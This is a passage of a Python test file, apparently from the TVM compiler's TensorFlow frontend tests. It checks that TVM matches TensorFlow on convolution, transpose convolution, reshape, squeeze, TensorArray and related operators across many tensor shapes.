_test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution(
"depthwise",
[4, 17, 17, 12],
[3, 3, 12, 2],
[1, 1],
[2, 2],
"VALID",
"NHWC",
add_shapes_to_graph_def=False,
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 15, 15, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 15, 15, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 16, 16, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 19],
[3, 3, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 17, 17, 19],
)
_test_convolution(
"conv_transpose",
[4, 17, 17, 19],
[1, 1, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 17, 17, 124],
)
_test_convolution(
"conv_transpose",
[4, 17, 17, 19],
[3, 3, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 17, 17, 124],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 17, 17, 12],
)
# kernel 2x2, strides (2,2)
_test_convolution(
"conv_transpose",
[4, 8, 8, 19],
[2, 2, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 16, 16, 19],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 16, 16, 12],
)
# output channel is 1
_test_convolution(
"conv_transpose",
[1, 8, 8, 19],
[1, 1, 1, 19],
[1, 1],
[1, 1],
"VALID",
"NHWC",
[1, 8, 8, 1],
)
# Test without adding shapes to graph def
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
add_shapes_to_graph_def=False,
)
# Explicit padding
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_convolution(
"conv",
[4, 8, 8, 16],
[1, 1, 16, 32],
[1, 1],
[1, 1],
[[0, 0], [2, 3], [0, 1], [0, 0]],
"NHWC",
)
_test_convolution(
"depthwise",
[4, 8, 8, 16],
[1, 1, 16, 1],
[1, 1],
[1, 1],
[[0, 0], [2, 3], [0, 1], [0, 0]],
"NHWC",
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
[[0, 0], [1, 0], [1, 0], [0, 0]],
"NHWC",
[4, 16, 16, 176],
)
#######################################################################
# Convolution3D
# -------------
def _test_convolution3d(
opname,
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
deconv_output_shape=[],
add_shapes_to_graph_def=True,
):
"""One iteration of 3D convolution with given shapes and attributes"""
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initialize the input tensor with an array of incrementing
# numbers starting from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
if data_format == "NDHWC":
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
else:
strides = [1, 1] + strides
dilations = [1, 1] + dilations
if opname == "conv":
nn_ops.conv3d(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Conv3D:0",
cuda_layout="NCDHW",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution3d():
if is_gpu_available():
_test_convolution3d(
"conv", [4, 176, 8, 8, 8], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
)
_test_convolution3d(
"conv", [4, 19, 17, 17, 17], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
)
_test_convolution3d(
"conv", [4, 124, 17, 17, 17], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
)
_test_convolution3d(
"conv", [4, 12, 17, 17, 17], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
)
_test_convolution3d(
"conv", [4, 8, 8, 8, 176], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 19], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 124], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 12], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
)
# Test without adding shapes to graph def
_test_convolution3d(
"conv",
[4, 17, 17, 17, 12],
[3, 3, 3, 12, 32],
[1, 1, 1],
[2, 2, 2],
"VALID",
"NDHWC",
add_shapes_to_graph_def=False,
)
#######################################################################
# Convolution3D Transpose
# -----------------------
def _test_convolution3d_transpose(
data_shape,
filter_shape,
strides,
padding,
output_shape,
data_format="NCDHW",
add_shapes_to_graph_def=True,
):
"""One iteration of 3D convolution transpose with given shapes and attributes"""
dtype = "float32"
data_array = np.random.uniform(size=data_shape).astype(dtype)
filter_array = np.random.uniform(size=filter_shape).astype(dtype)
if data_format == "NDHWC":
strides = [1] + strides + [1]
else:
strides = [1, 1] + strides
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data_shape, dtype=dtype)
in_filter = constant_op.constant(filter_array, shape=filter_shape, dtype=dtype)
nn_ops.conv3d_transpose(
in_data,
in_filter,
output_shape=output_shape,
strides=strides,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
data_array,
"Placeholder:0",
"conv3d_transpose:0",
cuda_layout="NDHWC",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution3d_transpose():
if is_gpu_available():
_test_convolution3d_transpose(
data_shape=[1, 10, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 10],
strides=[1, 1, 1],
padding="VALID",
output_shape=[1, 6, 8, 8, 8],
)
_test_convolution3d_transpose(
data_shape=[4, 9, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 9],
strides=[1, 1, 1],
padding="VALID",
output_shape=[4, 6, 8, 8, 8],
)
_test_convolution3d_transpose(
data_shape=[1, 3, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 3],
strides=[2, 2, 2],
padding="SAME",
output_shape=[1, 6, 15, 15, 15],
)
_test_convolution3d_transpose(
data_shape=[1, 16, 8, 8, 8],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 6, 24, 24, 24],
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 10],
filter_shape=[1, 1, 1, 6, 10],
strides=[1, 1, 1],
padding="VALID",
output_shape=[1, 8, 8, 8, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[4, 8, 8, 8, 9],
filter_shape=[1, 1, 1, 6, 9],
strides=[1, 1, 1],
padding="VALID",
output_shape=[4, 8, 8, 8, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 3],
filter_shape=[1, 1, 1, 6, 3],
strides=[2, 2, 2],
padding="SAME",
output_shape=[1, 15, 15, 15, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 16],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 24, 24, 24, 6],
data_format="NDHWC",
)
# Test without adding shapes to graph def
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 16],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 24, 24, 24, 6],
data_format="NDHWC",
add_shapes_to_graph_def=False,
)
#######################################################################
# BiasAdd
# -----------
def _test_biasadd(tensor_in_sizes, data_format):
"""One iteration of biasadd with given shapes and attributes"""
total_size_1 = 1
for s in tensor_in_sizes:
total_size_1 *= s
tensor_bias_sizes = [tensor_in_sizes[1]] if data_format == "NCHW" else [tensor_in_sizes[3]]
total_size_2 = tensor_bias_sizes[0]
# Initialize the input tensor with an array of incrementing
# numbers starting from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
bias_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_bias = constant_op.constant(bias_array, shape=tensor_bias_sizes, dtype="float32")
nn_ops.bias_add(in_data, in_bias, data_format=data_format)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"), "Placeholder:0", "BiasAdd:0"
)
@tvm.testing.uses_gpu
def test_forward_biasadd():
if is_gpu_available():
_test_biasadd([4, 176, 8, 8], "NCHW")
_test_biasadd([1, 100, 1, 1], "NCHW")
_test_biasadd([4, 19, 17, 17], "NCHW")
_test_biasadd([4, 124, 3, 3], "NCHW")
_test_biasadd([4, 8, 8, 176], "NHWC")
_test_biasadd([1, 1, 1, 100], "NHWC")
_test_biasadd([4, 17, 17, 19], "NHWC")
_test_biasadd([4, 3, 3, 124], "NHWC")
def _test_forward_where(input_shape):
with tf.Graph().as_default():
dtype = tf.float32
t = tf.constant(
np.random.choice([0, 1, -2, 3, -1, 0.1, -0.2], size=input_shape).astype(dtype.name)
)
out = tf.where(t)
compare_tf_with_tvm([], [], out.name, mode="debug")
compare_tf_with_tvm([], [], out.name, mode="vm")
def test_forward_argwhere():
_test_forward_where((5,))
_test_forward_where((5, 5))
_test_forward_where((5, 5, 5))
_test_forward_where((5, 5, 5, 5))
_test_forward_where((5, 5, 5, 5, 5))
#######################################################################
# SpaceToBatchND
# --------------
def _test_space_to_batch_nd(input_shape, block_shape, paddings, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
out = tf.space_to_batch_nd(in_data, block_shape, paddings)
compare_tf_with_tvm(data, in_data.name, out.name)
def _test_space_to_batch_nd_infer_paddings(input_shape, block_shape, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
padding_np = np.array([0, 1]).astype(np.int32).reshape((1, 2))
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
const1 = tf.constant(padding_np, dtype=tf.int32)
# make paddings the output of another op (tf.reverse) rather than a graph input,
# so it can be extracted with infer_value_simulated
paddings = tf.reverse(const1, axis=[-1])
out = tf.space_to_batch_nd(in_data, block_shape, paddings)
compare_tf_with_tvm(data, in_data.name, out.name)
def test_forward_space_to_batch_nd():
# test cases: https://www.tensorflow.org/api_docs/cc/class/tensorflow/ops/space-to-batch-n-d
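# e.g. a [1, 4, 4, 1] input with block_shape [2, 2] and zero paddings becomes a [4, 2, 2, 1]
# output: each spatial dim is divided by the block shape and the batch is multiplied by its product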
_test_space_to_batch_nd(input_shape=[1, 2, 2, 1], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(input_shape=[1, 2, 2, 3], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(input_shape=[1, 4, 4, 1], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(
input_shape=[2, 2, 4, 1], block_shape=[2, 2], paddings=[[0, 0], [2, 0]], dtype="int64"
)
# pylint: disable=line-too-long
# https://github.com/tensorflow/tensorflow/blob/24f578/tensorflow/python/kernel_tests/spacetobatch_op_test.py
_test_space_to_batch_nd(input_shape=[2, 3], block_shape=[2], paddings=[[1, 0]], dtype="float32")
_test_space_to_batch_nd(
input_shape=[2, 3, 2], block_shape=[2], paddings=[[1, 0]], dtype="float64"
)
_test_space_to_batch_nd_infer_paddings(input_shape=[2, 3, 2], block_shape=[2])
#######################################################################
# BatchToSpaceND
# --------------
def _test_batch_to_space_nd(input_shape, block_shape, crops, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
out = tf.batch_to_space_nd(in_data, block_shape, crops)
compare_tf_with_tvm(data, in_data.name, out.name)
def test_forward_batch_to_space_nd():
# test cases: https://www.tensorflow.org/api_docs/cc/class/tensorflow/ops/batch-to-space-n-d
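# batch_to_space_nd is the inverse of space_to_batch_nd: e.g. a [4, 1, 1, 1] input with
# block_shape [2, 2] and zero crops becomes a [1, 2, 2, 1] output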
_test_batch_to_space_nd(input_shape=[4, 1, 1, 1], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(input_shape=[4, 1, 1, 3], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(input_shape=[4, 2, 2, 1], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(
input_shape=[8, 1, 3, 1], block_shape=[2, 2], crops=[[0, 0], [2, 0]], dtype="int64"
)
# pylint: disable=line-too-long
# https://github.com/tensorflow/tensorflow/blob/24f578/tensorflow/python/kernel_tests/batchtospace_op_test.py
_test_batch_to_space_nd(
input_shape=[18, 2, 1, 2], block_shape=[2, 3], crops=[[1, 1], [0, 0]], dtype="float32"
)
_test_batch_to_space_nd(
input_shape=[20, 5, 8, 7], block_shape=[2, 2], crops=[[1, 1], [1, 1]], dtype="float64"
)
#######################################################################
# Reshape
# -------
def _test_reshape(data, out_shape):
"""One iteration of reshape operation with given data and out shape"""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_with_call():
"""relay.expr.Call as shape"""
data = np.zeros((6, 4, 2))
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
out_shape = tf.constant([1, 2, 3], dtype="int32")
out_shape = tf.multiply(out_shape, 2)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_like(data, shape_like):
"""A special case for reshape."""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
in_shape_like = array_ops.placeholder(shape=shape_like.shape, dtype=data.dtype)
out_shape = array_ops.shape(in_shape_like)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_symbolic(data, a_data, b_data):
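# Reshape where the target shape is computed at run time (the sum of two placeholders),
# so only the debug and vm executors, which handle dynamic shapes, are exercised below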
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
a = array_ops.placeholder(shape=a_data.shape, dtype=a_data.dtype)
b = array_ops.placeholder(shape=b_data.shape, dtype=b_data.dtype)
newshape = tf.add(a, b)
out = array_ops.reshape(in_data, newshape)
for mode in ["debug", "vm"]:
compare_tf_with_tvm(
[data, a_data, b_data], [in_data.name, a.name, b.name], out.name, mode=mode
)
def test_forward_reshape():
_test_reshape(np.arange(6.0), [2, 3])
_test_reshape(np.arange(6), [-1, 2])
_test_reshape(np.arange(6), [3, -1])
_test_reshape(np.arange(6), [-1])
_test_reshape_with_call()
_test_reshape_like(np.zeros((3, 6)), np.zeros((9, 2)))
_test_reshape_symbolic(np.arange(6.0), np.array([2, 0]), np.array([0, 3]))
_test_reshape_symbolic(np.arange(6), np.array([-1, 0]), np.array([0, 2]))
_test_reshape_symbolic(np.arange(6), np.array([3, 0]), np.array([3, -1]))
_test_reshape_symbolic(np.arange(6), np.array([0]), np.array([-1]))
#######################################################################
# DepthToSpace
# ------------
def _test_depthtospace(data, block_size):
"""One iteration of depth_to_space operation with given data and block size"""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.depth_to_space(in_data, block_size)
compare_tf_with_tvm(data, "Placeholder:0", "DepthToSpace:0")
def test_forward_depthtospace():
_test_depthtospace(np.random.normal(size=[1, 32, 32, 4]), 2)
_test_depthtospace(np.random.normal(size=[1, 16, 8, 32]), 4)
#######################################################################
# SpaceToDepth
# ------------
def _test_spacetodepth(data, block_size):
"""One iteration of space_to_depth operation with given data and block size"""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.space_to_depth(in_data, block_size)
compare_tf_with_tvm(data, "Placeholder:0", "SpaceToDepth:0")
def test_forward_spacetodepth():
_test_spacetodepth(np.random.normal(size=[1, 32, 32, 4]), 2)
_test_spacetodepth(np.random.normal(size=[1, 16, 8, 32]), 4)
#######################################################################
# Squeeze
# -------
def _test_squeeze(data, squeeze_dims=None):
"""One iteration of squeeze"""
if squeeze_dims is None:
squeeze_dims = []
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
if squeeze_dims:
array_ops.squeeze(in_data, squeeze_dims)
else:
array_ops.squeeze(in_data)
compare_tf_with_tvm(data, "Placeholder:0", "Squeeze:0")
def test_forward_squeeze():
"""Squeeze"""
# Nothing to squeeze.
_test_squeeze(np.arange(2).reshape((2)))
_test_squeeze(np.arange(6).reshape((2, 3)))
# Squeeze the middle element away.
_test_squeeze(np.arange(4).reshape((2, 1, 2)))
# Squeeze on both ends.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)))
# Positive squeeze dim index.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [0])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [2, 4])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [0, 4, 2])
# Negative squeeze dim index.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-1])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-3, -5])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-3, -5, -1])
#######################################################################
# TensorArray
# -----------
def test_tensor_array_write_read():
def run(dtype_str, infer_shape, element_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
np_data = np.array([[1.0, 2.0], [3.0, 4.0]]).astype(dtype_str)
in_data = [np_data, np_data]
t1 = tf.constant(np_data, dtype=dtype)
t2 = tf.constant(np_data, dtype=dtype)
ta1 = tf.TensorArray(
dtype=dtype, size=2, infer_shape=infer_shape, element_shape=element_shape
)
ta2 = ta1.write(0, t1)
ta3 = ta2.write(1, t2)
out = ta3.read(0)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], "TensorArrayReadV3:0", mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, False, None)
run(dtype, False, tf.TensorShape([None, 2]))
run(dtype, True, None)
def test_tensor_array_scatter():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
if infer_shape:
element_shape = tf.TensorShape([tf.Dimension(None)])
else:
element_shape = None
ta0 = _construct_scatter(dtype, dtype_str, element_shape, infer_shape, 3)
out0 = ta0.read(0)
out1 = ta0.read(1)
out2 = ta0.read(2)
ta1 = _construct_scatter(dtype, dtype_str, element_shape, infer_shape, 4)
out4 = ta1.read(0)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayReadV3:0"], mode="vm")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_1:0"], mode="vm")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0"], mode="vm")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0", out4.name], mode="vm")
def _construct_scatter(dtype, dtype_str, element_shape, infer_shape, size):
arr = [[float(i)] for i in range(size)]
indices_arr = [i for i in range(size - 1, -1, -1)]
t = tf.constant(np.array(arr).astype(dtype_str), dtype=dtype)
indices = tf.constant(indices_arr)
ta1 = tf.TensorArray(
dtype=dtype, size=size, infer_shape=infer_shape, element_shape=element_shape
)
ta2 = ta1.scatter(indices, t)
return ta2
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_gather():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str))
scatter_indices = tf.constant([2, 1, 0])
gather_indices = tf.constant([1, 2])
ta1 = tf.TensorArray(dtype=dtype, size=3, infer_shape=infer_shape)
ta2 = ta1.scatter(scatter_indices, t)
t1 = ta2.gather(gather_indices)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayGatherV3:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, True)
def test_tensor_array_split():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(
np.array([[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0]]).astype(
dtype_str
),
dtype=dtype,
)
split_length = tf.constant([2, 2, 2, 2], dtype=tf.int32)
ta1 = tf.TensorArray(dtype=dtype, size=4, infer_shape=infer_shape)
ta2 = ta1.split(t, split_length)
out0 = ta2.read(0)
out1 = ta2.read(1)
out2 = ta2.read(2)
out3 = ta2.read(3)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayReadV3:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_1:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_3:0"], mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_concat():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(
np.array([[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0]]).astype(
dtype_str
),
dtype=dtype,
)
split_length = tf.constant([2, 2, 2, 2], dtype=tf.int32)
ta1 = tf.TensorArray(dtype=dtype, size=4, infer_shape=infer_shape)
ta2 = ta1.split(t, split_length)
t = ta2.concat()
out = tf.identity(t)
compare_tf_with_tvm([], [], ["Identity:0"], mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_size():
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
np_data = np.array([[1.0, 2.0], [3.0, 4.0]]).astype(dtype_str)
in_data = [np_data, np_data]
t1 = tf.constant(np_data, dtype=dtype)
t2 = tf.constant(np_data, dtype=dtype)
ta1 = tf.TensorArray(dtype=dtype, size=2, infer_shape=infer_shape)
ta2 = ta1.write(0, t1)
ta3 = ta2.write(1, t2)
out = ta3.size()
g = tf.get_default_graph()
compare_tf_with_tvm([], [], "TensorArraySizeV3:0", mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_stack():
def run(dtype_str, infer_shape):
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str))
scatter_indices = tf.constant([2, 1, 0])
ta1 = tf.TensorArray(dtype=dtype, size=3, infer_shape=infer_shape)
ta2 = ta1.scatter(scatter_indices, t)
t1 = ta2.stack()
print(t1)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayStack/TensorArrayGatherV3:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, True)
def test_tensor_array_unstack():
def run(dtype_str, input_shape, infer_shape):
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.random.choice([0, 1, 2, 3], size=input_shape).astype(dtype.name))
ta1 = tf.TensorArray(dtype=dtype, infer_shape=infer_shape, size=input_shape[0])
ta2 = ta1.unstack(t)
out0 = ta2.size()
out1 = ta2.read(0)
compare_tf_with_tvm([], [], "TensorArraySizeV3:0", mode="debug")
compare_tf_with_tvm([], [], "TensorArrayReadV3:0", mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, (5,), False)
run(dtype, (5, 5), True)
run(dtype, (5, 5, 5), False)
run(dtype, (5, 5, 5, 5), True)
#######################################################################
# ConcatV2
# --------
def _test_concat_v2(shape1, shape2, dim):
"""One iteration of ConcatV2"""
with tf.Graph().as_default():
dtype = "float32"
in1 = tf.placeholder(shape=shape1, dtype=dtype, name="in1")
in2 = tf.placeholder(shape=shape2, dtype=dtype, name="in2")
array_ops.concat_v2([in1, in2], dim)
np_data1 = np.random.uniform(size=shape1).astype(dtype)
np_data2 = np.random.uniform(size=shape2).astype(dtype)
compare_tf_with_tvm([np_data1, np_data2], ["in1:0", "in2:0"], "ConcatV2:0")
def test_forward_concat_v2():
if tf.__version__ < LooseVersion("1.4.1"):
return
_test_concat_v2([2, 3], [2, 3], 0)
_test_concat_v2([10, 3, 5], [2, 3, 5], 0)
_test_concat_v2([2, 3], [2, 3], 1)
_test_concat_v2([5, 8], [5, 4], 1)
_test_concat_v2([2, 8, 5], [2, 8, 6], -1)
#######################################################################
# Sigmoid
# -------
def _test_sigmoid(data):
"""One iteration of sigmoid"""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
sigmoid_out = math_ops.sigmoid(in_data)
compare_tf_with_tvm(data, "Placeholder:0", "Sigmoid:0")
def test_forward_sigmoid():
"""Sigmoid"""
_test_sigmoid(np.random.uniform(size=(3, 4, 4, 3)).astype("float32"))
#######################################################################
# Argmin/Argmax
# -------------
def _test_argx(func, data, **kwargs):
with tf.Graph().as_default():
inp = array_ops.placeholder(shape=data.shape, dtype=data.dtype, name="c0")
func(inp, name="argx0", **kwargs)
compare_tf_with_tvm(data, "c0:0", "argx0:0")
def test_forward_argminmax():
for output_type in [tf.int64, tf.int32]:
for axis in [None, 0, 1, 2]:
data = np.random.uniform(size=(8, 4, 9)).astype("float32")
_test_argx(tf.argmax, data=data, axis=axis, output_type=output_type)
_test_argx(tf.argmin, data=data, axis=axis, output_type=output_type)
#######################################################################
# Variable
# --------
def _test_variable(data):
"""One iteration of a variable"""
tf.reset_default_graph()
with tf.Graph().as_default():
input_op = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
input_tensor = array_ops.reshape(input_op, data.shape)
size = input_tensor.shape.dims[1]
with variable_scope.variable_scope("linear", reuse=None):
w = variable_scope.get_variable("w", shape=[size, size], dtype=input_tensor.dtype)
math_ops.matmul(input_tensor, w)
compare_tf_with_tvm(data, "Placeholder:0", "MatMul:0", init_global_variables=True)
def test_forward_variable():
"""Variable type op test"""
_test_variable(np.random.uniform(size=(32, 100)).astype("float32"))
@tvm.testing.parametrize_targets("llvm", "cuda")
def test_read_variable_op(target, dev):
"""Read Variable op test"""
tf.reset_default_graph()
data = np.random.uniform(size=(32, 100)).astype("float32")
input_tensor = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
size = input_tensor.shape.dims[1]
var_data = np.random.uniform(-5, 5, size=[size, size]).astype(np.float32)
input_var = tf.Variable(var_data, name="var1", use_resource=True)
math_ops.matmul(input_tensor, input_var)
out_name = ["MatMul:0"]
out_node = ["MatMul"]
in_name = ["Placeholder:0"]
in_node = ["Placeholder"]
in_data = [data]
with tf.Session() as sess:
sess.run(variables.global_variables_initializer())
final_graph_def = sess.graph.as_graph_def(add_shapes=True)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
shape_dict = {e: i.shape for e, i in zip(in_name, in_data)}
with pytest.raises(Exception) as execinfo:
mod, params = relay.frontend.from_tensorflow(
final_graph_def, layout=None, shape=shape_dict, outputs=None
)
assert execinfo.value.args[0].startswith("Graph is not frozen. Provide a frozen graph")
# Now convert the variables to constant and run inference on the converted graph
final_graph_def = tf.graph_util.convert_variables_to_constants(
sess,
sess.graph.as_graph_def(add_shapes=True),
out_node,
)
tvm_output = run_tvm_graph(
final_graph_def,
in_data,
in_node,
target=target,
out_names=out_name,
num_output=len(out_name),
)
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-4, rtol=1e-5)
sess.close()
